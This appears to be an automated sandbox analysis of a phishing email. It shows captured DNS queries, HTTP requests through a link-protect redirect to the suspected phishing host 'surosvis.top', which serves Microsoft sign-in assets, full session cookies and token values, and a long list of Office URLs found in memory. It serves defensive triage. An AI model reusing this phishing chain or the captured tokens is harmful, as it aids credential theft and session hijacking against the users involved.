OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg HTTP/1.1Host: surosvis.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA; brcap=0

Source: global traffic	DNS traffic detected: DNS query: linkprotect.cudasvc.com
Source: global traffic	DNS traffic detected: DNS query: trk.klclick3.com
Source: global traffic	DNS traffic detected: DNS query: viptim.ro
Source: global traffic	DNS traffic detected: DNS query: gaunited.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: surosvis.top
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: outlook.office365.com
Source: global traffic	DNS traffic detected: DNS query: r4.res.office365.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 18:52:18 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 8VOSPz0hl6gm4g3IG0apMEMFck5RpSJ/+xQ=$unc8+9H25llptXAGcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8a0a82aa795d421d-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 18:52:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 90hSVnOLEbfVJaZnC6khM9VwJVcUqNYZHq8=$VRk6Lp+6PomxHKYZcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8a0a82be7eae41f8-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 18:52:31 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: kvdV296x+FkzbHFTm2Nk5ecJAHF8D5nM5mM=$BC9HGpgwwwtb09x2Server: cloudflareCF-RAY: 8a0a82f6392642af-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: ec2e98f6-0686-4f0b-b945-133280031f00x-ms-ests-server: 2.1.18463.4 - NCUS ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originDate: Tue, 09 Jul 2024 18:52:38 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: chromecache_141.8.dr	String found in binary or memory: http://github.com/jquery/globalize
Source: chromecache_137.8.dr, chromecache_151.8.dr	String found in binary or memory: http://knockoutjs.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: chromecache_137.8.dr	String found in binary or memory: http://www.json.org/json2.js
Source: chromecache_137.8.dr, chromecache_151.8.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	String found in binary or memory: https://aka.ms/LearnAboutSenderIdentification
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.aadrm.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/api/addins/search
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.cortana.ai
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.microsoftstream.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.office.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.onedrive.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://api.scheduler.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://app.powerbi.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://augloop.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cdn.entity.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cortana.ai
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cortana.ai/api
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://cr.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://d.docs.live.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://directory.services.
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ecs.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://edge.skype.com/registrar/prod
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://edge.skype.com/rps
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: chromecache_151.8.dr	String found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://graph.windows.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://graph.windows.net/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://ic3.teams.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://invites.office.com/
Source: chromecache_137.8.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: July2024.eml	String found in binary or memory: https://linkprotect.cudasvc.com/url?a=3Dtrk.klclick3.com%2fls%2f=
Source: ~WRS{36F80BB7-642B-4BA9-8822-A4A1F086C932}.tmp.0.dr	String found in binary or memory: https://linkprotect.cudasvc.com/url?a=trk.klclick3.com%2fls%2fclick%3fupn%3du001.dtwVv1Ru50yD1xohsam
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr, chromecache_155.8.dr	String found in binary or memory: https://login.microsoftonline.com
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.microsoftonline.com/organizations
Source: chromecache_155.8.dr	String found in binary or memory: https://login.windows-ppe.net
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.windows.local
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F8FE5A2D-1775-4B7B-A8ED-D32E366A42BA.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
